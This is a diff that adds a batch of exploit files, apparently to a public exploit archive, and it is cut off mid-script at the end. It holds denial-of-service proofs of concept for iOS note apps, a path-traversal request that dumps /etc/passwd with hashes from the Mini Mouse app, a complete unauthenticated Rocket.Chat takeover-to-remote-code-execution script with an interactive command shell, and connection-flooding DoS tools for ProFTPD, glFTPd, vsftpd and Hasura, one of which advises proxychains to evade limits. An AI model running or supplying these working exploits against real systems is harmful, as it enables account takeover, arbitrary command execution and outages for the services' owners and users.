b/exploits/ios/dos/50001.py @@ -0,0 +1,35 @@ +# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) +# Date: 06-14-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888 +# Version: 3.0.3 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50002.py b/exploits/ios/dos/50002.py new file mode 100755 index 000000000..7ad0008ff --- /dev/null +++ b/exploits/ios/dos/50002.py @@ -0,0 +1,37 @@ +# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC) +# Date: 06-14-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/es/app/post-it/id920127738 +# Version: 5.0.1 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Post-it is vulnerable to a DoS condition when a long list of characters is +being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new +payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50003.py b/exploits/ios/dos/50003.py new file mode 100755 index 000000000..f13b9dbc2 --- /dev/null +++ b/exploits/ios/dos/50003.py @@ -0,0 +1,36 @@ +# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC) +# Date: 06-14-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 +# Version: 6.4 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Notex – the best notes is vulnerable to a DoS condition when a long list of +characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/local/49977.py b/exploits/ios/local/49977.py new file mode 100755 index 000000000..7dda87b05 --- /dev/null +++ b/exploits/ios/local/49977.py @@ -0,0 +1,35 @@ +# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC) +# Date: 06-09-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619 +# Version: 4.2 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/webapps/49747.txt b/exploits/ios/webapps/49747.txt new file mode 100644 index 000000000..17f7aeb26 --- /dev/null +++ b/exploits/ios/webapps/49747.txt @@ -0,0 +1,397 @@ +# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal +# Author: gosh +# Date: 05-04-2021 +# Vendor Homepage: http://yodinfo.com +# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948 +# Version: 9.3.0 +# Tested on: iPhone; iOS 14.4.2 + +GET /op=get_device_info HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 0 + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/json +Content-Range: bytes 0-0/-1 + +{ + "ret_code": 1, + "ret_msg": "success", + "data": { + "uuid": "7E07125B-61BE-4F12-820C-FA706C445219", + "model": "iPhone", + "sys_name": "iOS", + "sys_version": "14.4.2", + "battery_state": 0, + "battery_level": -1, + "memery_total_size": 2983772160, + "device_name": "mobile", + "user_name": "iPhone", + "pwd": "", + "dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download", + "dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents", + "dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop", + "sys_type": 3 + } +} + + + +------------------------------------------------------------------------------------- + + +POST /op=get_file_list HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 0 + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/json +Content-Range: bytes 0-0/-1 + +{ + "ret_code": 1, + "ret_msg": "success", + "data": { + "list": [{ + "path": "//usr", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "usr", + "name_display": "usr", + "file_size": 288, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//bin", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "bin", + "name_display": "bin", + "file_size": 128, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//sbin", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "sbin", + "name_display": "sbin", + "file_size": 544, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//.file", + "is_local": true, + "is_hide": true, + "is_floder": false, + "name": ".file", + "name_display": ".file", + "file_size": 0, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//etc", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "etc", + "name_display": "etc", + "file_size": 11, + "create_time": 1577865.600000, + "update_time": 1577865.600000, + "sys_type": 3 + }, { + "path": "//System", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "System", + "name_display": "System", + "file_size": 128, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//var", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "var", + "name_display": "var", + "file_size": 11, + "create_time": 1577865.600000, + "update_time": 1577865.600000, + "sys_type": 3 + }, { + "path": "//Library", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Library", + "name_display": "Library", + "file_size": 672, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//private", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "private", + "name_display": "private", + "file_size": 224, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//dev", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "dev", + "name_display": "dev", + "file_size": 1395, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//.ba", + "is_local": true, + "is_hide": true, + "is_floder": true, + "name": ".ba", + "name_display": ".ba", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//.mb", + "is_local": true, + "is_hide": true, + "is_floder": true, + "name": ".mb", + "name_display": ".mb", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//tmp", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "tmp", + "name_display": "tmp", + "file_size": 15, + "create_time": 1577865.600000, + "update_time": 1577865.600000, + "sys_type": 3 + }, { + "path": "//Applications", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Applications", + "name_display": "Applications", + "file_size": 3296, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//Developer", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Developer", + "name_display": "Developer", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//cores", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "cores", + "name_display": "cores", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }] + } +} + +------------------------- +using the data found: +/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download + +POST /op=get_file_list HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 101 + +{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"} + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/json +Content-Range: bytes 0-0/-1 + +{ + "ret_code": 1, + "ret_msg": "success", + "data": { + "list": [{ + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "GDT", + "name_display": "GDT", + "file_size": 96, + "create_time": 1617228.400302, + "update_time": 1617228.400302, + "sys_type": 3 + }, { + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg", + "is_local": true, + "is_hide": false, + "is_floder": false, + "name": "input_photo.jpg", + "name_display": "input_photo.jpg", + "file_size": 6141491, + "create_time": 1617583.738397, + "update_time": 1617583.738402, + "sys_type": 3 + }, { + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Ico", + "name_display": "Ico", + "file_size": 64, + "create_time": 1617583.334913, + "update_time": 1617583.334913, + "sys_type": 3 + }, { + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Download", + "name_display": "Download", + "file_size": 64, + "create_time": 1617228.371587, + "update_time": 1617228.371587, + "sys_type": 3 + }] + } +} + +---------------------------------------------------------------------- + +GET /file=/etc/passwd HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 4 + +{} + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/octet-stream +Content-Range: bytes 0-0/2018 +Content-Length : 2018 + +## +# User Database +# +# This file is the authoritative user database. +## + +nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false +root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh +mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh +daemon:*:1:1:System Services:/var/root:/usr/bin/false +_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false +_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false +_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false +_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false +_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false +_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false +_securityd:*:64:64:securityd:/var/empty:/usr/bin/false +_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false +_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false +_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false +_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false +_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false +_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false +_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false +_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false +_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false +_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false +_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false +_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false +_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false +_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false +_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false +_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false +_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false +_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false +_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false \ No newline at end of file diff --git a/exploits/linux/webapps/49960.py b/exploits/linux/webapps/49960.py new file mode 100755 index 000000000..0876dc164 --- /dev/null +++ b/exploits/linux/webapps/49960.py @@ -0,0 +1,172 @@ +# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) +# Author: enox +# Date: 06-06-2021 +# Product: Rocket.Chat +# Vendor: https://rocket.chat/ +# Vulnerable Version(s): Rocket.Chat 3.12.1 +# CVE: CVE-2021-22911 +# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat + +#!/usr/bin/python + +import requests +import string +import time +import hashlib +import json +import oathtool +import argparse + +parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') +parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) +parser.add_argument('-a', help='Administrator email', required=True) +parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) +args = parser.parse_args() + + +adminmail = args.a +lowprivmail = args.u +target = args.t + + +def forgotpassword(email,url): + payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) + print("[+] Password Reset Email Sent") + + +def resettoken(url): + u = url+"/api/v1/method.callAnon/getPasswordPolicy" + headers={'content-type': 'application/json'} + token = "" + + num = list(range(0,10)) + string_ints = [str(int) for int in num] + characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints + + while len(token)!= 43: + for c in characters: + payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + time.sleep(0.5) + if 'Meteor.Error' not in r.text: + token += c + print(f"Got: {token}") + + print(f"[+] Got token : {token}") + return token + + +def changingpassword(url,token): + payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) + if "error" in r.text: + exit("[-] Wrong token") + print("[+] Password was changed !") + + +def twofactor(url,email): + # Authenticating + sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() + payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) + if "error" in r.text: + exit("[-] Couldn't authenticate") + data = json.loads(r.text) + data =(data['message']) + userid = data[32:49] + token = data[60:103] + print(f"[+] Succesfully authenticated as {email}") + + # Getting 2fa code + cookies = {'rc_uid': userid,'rc_token': token} + headers={'X-User-Id': userid,'X-Auth-Token': token} + payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' + r = requests.get(url+payload,cookies=cookies,headers=headers) + code = r.text[46:98] + print(f"Got the code for 2fa: {code}") + return code + + +def changingadminpassword(url,token,code): + payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) + if "403" in r.text: + exit("[-] Wrong token") + + print("[+] Admin password changed !") + + +def rce(url,code,cmd): + # Authenticating + sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() + headers={'content-type': 'application/json'} + payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' + r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) + if "error" in r.text: + exit("[-] Couldn't authenticate") + data = json.loads(r.text) + data =(data['message']) + userid = data[32:49] + token = data[60:103] + print("[+] Succesfully authenticated as administrator") + + # Creating Integration + payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' + cookies = {'rc_uid': userid,'rc_token': token} + headers = {'X-User-Id': userid,'X-Auth-Token': token} + r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) + data = r.text + data = data.split(',') + token = data[12] + token = token[9:57] + _id = data[18] + _id = _id[7:24] + + # Triggering RCE + u = url + '/hooks/' + _id + '/' +token + r = requests.get(u) + print(r.text) + +############################################################ + + +# Getting Low Priv user +print(f"[+] Resetting {lowprivmail} password") +## Sending Reset Mail +forgotpassword(lowprivmail,target) + +## Getting reset token +token = resettoken(target) + +## Changing Password +changingpassword(target,token) + + +# Privilege Escalation to admin +## Getting secret for 2fa +secret = twofactor(target,lowprivmail) + + +## Sending Reset mail +print(f"[+] Resetting {adminmail} password") +forgotpassword(adminmail,target) + +## Getting reset token +token = resettoken(target) + + +## Resetting Password +code = oathtool.generate_otp(secret) +changingadminpassword(target,token,code) + +## Authenticting and triggering rce + +while True: + cmd = input("CMD:> ") + code = oathtool.generate_otp(secret) + rce(target,code,cmd) \ No newline at end of file diff --git a/exploits/multiple/dos/49697.py b/exploits/multiple/dos/49697.py new file mode 100755 index 000000000..9f99a6189 --- /dev/null +++ b/exploits/multiple/dos/49697.py @@ -0,0 +1,101 @@ +# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service +# Date: 22/03/2021 +# Exploit Author: xynmaps +# Vendor Homepage: http://www.proftpd.org/ +# Software Link: https://github.com/proftpd/proftpd +# Version: 1.3.7a +# Tested on: Parrot Security OS 5.9.0 + +#-------------------------------# + +#encoding=utf8 +#__author__ = XYN/Dump/NSKB3 +#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3. +""" +ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, +you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. +(if it's limited, just run this script from different proxies using proxychains, and it will work) +""" + +import socket +import sys +import threading +import subprocess +import time + +banner = """ +._________________. +| ProFTPD | +| D o S | +|_________________| +|By XYN/DUMP/NSKB3| +|_|_____________|_| +|_|_|_|_____|_|_|_| +|_|_|_|_|_|_|_|_|_| + +""" +usage = "{} ".format(sys.argv[0]) + +def test(t,p): + s = socket.socket() + s.settimeout(10) + try: + s.connect((t, p)) + response = s.recv(65535) + s.close() + return 0 + except socket.error: + print("Port {} is not open, please specify a port that is open.".format(p)) + sys.exit() +def attack(targ, po, id): + try: + subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + #print("Worker {} running".format(id)) + except OSError: pass +def main(): + global target, port, start + print banner + try: + target = sys.argv[1] + except: + print usage + sys.exit() + try: + port = int(sys.argv[2]) + except: + port = 21 + try: + conns = int(sys.argv[3]) + except: + conns = 50 + print("[!] Testing if {0}:{1} is open".format(target, port)) + test(target, port) + print("[+] Port {} open, starting attack...".format(port)) + time.sleep(2) + print("[+] Attack started on {0}:{1}!".format(target, port)) + def loop(target, port, conns): + global start + threading.Thread(target=timer).start() + while 1: + for i in range(1, conns + 3): + t = threading.Thread(target=attack, args=(target,port,i,)) + t.start() + if i > conns + 2: + t.join() + break + loop() + + t = threading.Thread(target=loop, args=(target, port, conns,)) + t.start() + +def timer(): + start = time.time() + while 1: + if start < time.time() + float(900): pass + else: + subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + t = threading.Thread(target=loop, args=(target, port,)) + t.start() + break + +main() \ No newline at end of file diff --git a/exploits/multiple/dos/49773.py b/exploits/multiple/dos/49773.py new file mode 100755 index 000000000..beaa01d3a --- /dev/null +++ b/exploits/multiple/dos/49773.py @@ -0,0 +1,101 @@ +# Exploit Title: glFTPd 2.11a - Remote Denial of Service +# Date: 15/05/2021 +# Exploit Author: xynmaps +# Vendor Homepage: https://glftpd.io/ +# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz +# Version: 2.11a +# Tested on: Parrot Security OS 5.9.0 + +#-------------------------------# + +#encoding=utf8 +#__author__ = XYN/Dump/NSKB3 +#glFTPd Denial of Service exploit by XYN/Dump/NSKB3. +""" +glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, +you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. +(if it's limited, just run this script from different proxies using proxychains, and it will work) +""" + +import socket +import sys +import threading +import subprocess +import time + +banner = """ +._________________. +| glFTPd | +| D o S | +|_________________| +|By XYN/DUMP/NSKB3| +|_|_____________|_| +|_|_|_|_____|_|_|_| +|_|_|_|_|_|_|_|_|_| + +""" +usage = "{} ".format(sys.argv[0]) + +def test(t,p): + s = socket.socket() + s.settimeout(10) + try: + s.connect((t, p)) + response = s.recv(65535) + s.close() + return 0 + except socket.error: + print("Port {} is not open, please specify a port that is open.".format(p)) + sys.exit() +def attack(targ, po, id): + try: + subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + #print("Worker {} running".format(id)) + except OSError: pass +def main(): + global target, port, start + print banner + try: + target = sys.argv[1] + except: + print usage + sys.exit() + try: + port = int(sys.argv[2]) + except: + port = 21 + try: + conns = int(sys.argv[3]) + except: + conns = 50 + print("[!] Testing if {0}:{1} is open".format(target, port)) + test(target, port) + print("[+] Port {} open, starting attack...".format(port)) + time.sleep(2) + print("[+] Attack started on {0}:{1}!".format(target, port)) + def loop(target, port, conns): + global start + threading.Thread(target=timer).start() + while 1: + for i in range(1, conns + 3): + t = threading.Thread(target=attack, args=(target,port,i,)) + t.start() + if i > conns + 2: + t.join() + break + loop() + + t = threading.Thread(target=loop, args=(target, port, conns,)) + t.start() + +def timer(): + start = time.time() + while 1: + if start < time.time() + float(900): pass + else: + subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + t = threading.Thread(target=loop, args=(target, port,)) + t.start() + break + +main() \ No newline at end of file diff --git a/exploits/multiple/dos/49789.py b/exploits/multiple/dos/49789.py new file mode 100755 index 000000000..c2c02f7a2 --- /dev/null +++ b/exploits/multiple/dos/49789.py @@ -0,0 +1,50 @@ +# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service +# Software: Hasura GraphQL +# Software Link: https://github.com/hasura/graphql-engine +# Version: 1.3.3 +# Author: Dolev Farhi +# Date: 4/19/2021 +# Tested on: Ubuntu + +import sys +import requests +import threading + +HASURA_SCHEME = 'http' +HASURA_HOST = '192.168.1.1' +HASURA_PORT = 80 +THREADS = 300 + +def create_table(): + data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]} + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r + +def insert_row(): + bomb = 'A' * 100000 + data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}} + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r + +def DoS(): + dups = 'test \n ' * 1000000 + data = {'query': 'query { test_db { ' + dups + '} }'} + endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r + +if not create_table().ok: + print('something went wrong, could not create table.') + sys.exit(1) + +if not insert_row().ok: + print('something went wrong, could not insert row') + sys.exit(1) + +while True: + for _ in range(THREADS): + print('Starting') + t = threading.Thread(target=DoS, args=()) + t.start() \ No newline at end of file diff --git a/exploits/multiple/remote/49719.py b/exploits/multiple/remote/49719.py new file mode 100755 index 000000000..b5ca35382 --- /dev/null +++ b/exploits/multiple/remote/49719.py @@ -0,0 +1,101 @@ +# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service +# Date: 22-03-2021 +# Exploit Author: xynmaps +# Vendor Homepage: https://security.appspot.com/vsftpd.html +# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz +# Version: 3.0.3 +# Tested on: Parrot Security OS 5.9.0 + +#-------------------------------# + +#encoding=utf8 +#__author__ = XYN/Dump/NSKB3 +#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3. +""" +VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, +you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. +(if it's limited, just run this script from different proxies using proxychains, and it will work) +""" + +import socket +import sys +import threading +import subprocess +import time + +banner = """ +._________________. +| VS-FTPD | +| D o S | +|_________________| +|By XYN/DUMP/NSKB3| +|_|_____________|_| +|_|_|_|_____|_|_|_| +|_|_|_|_|_|_|_|_|_| + +""" +usage = "{} ".format(sys.argv[0]) + +def test(t,p): + s = socket.socket() + s.settimeout(10) + try: + s.connect((t, p)) + response = s.recv(65535) + s.close() + return 0 + except socket.error: + print("Port {} is not open, please specify a port that is open.".format(p)) + sys.exit() +def attack(targ, po, id): + try: + subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + #print("Worker {} running".format(id)) + except OSError: pass +def main(): + global target, port, start + print banner + try: + target = sys.argv[1] + except: + print usage + sys.exit() + try: + port = int(sys.argv[2]) + except: + port = 21 + try: + conns = int(sys.argv[3]) + except: + conns = 50 + print("[!] Testing if {0}:{1} is open".format(target, port)) + test(target, port) + print("[+] Port {} open, starting attack...".format(port)) + time.sleep(2) + print("[+] Attack started on {0}:{1}!".format(target, port)) + def loop(target, port, 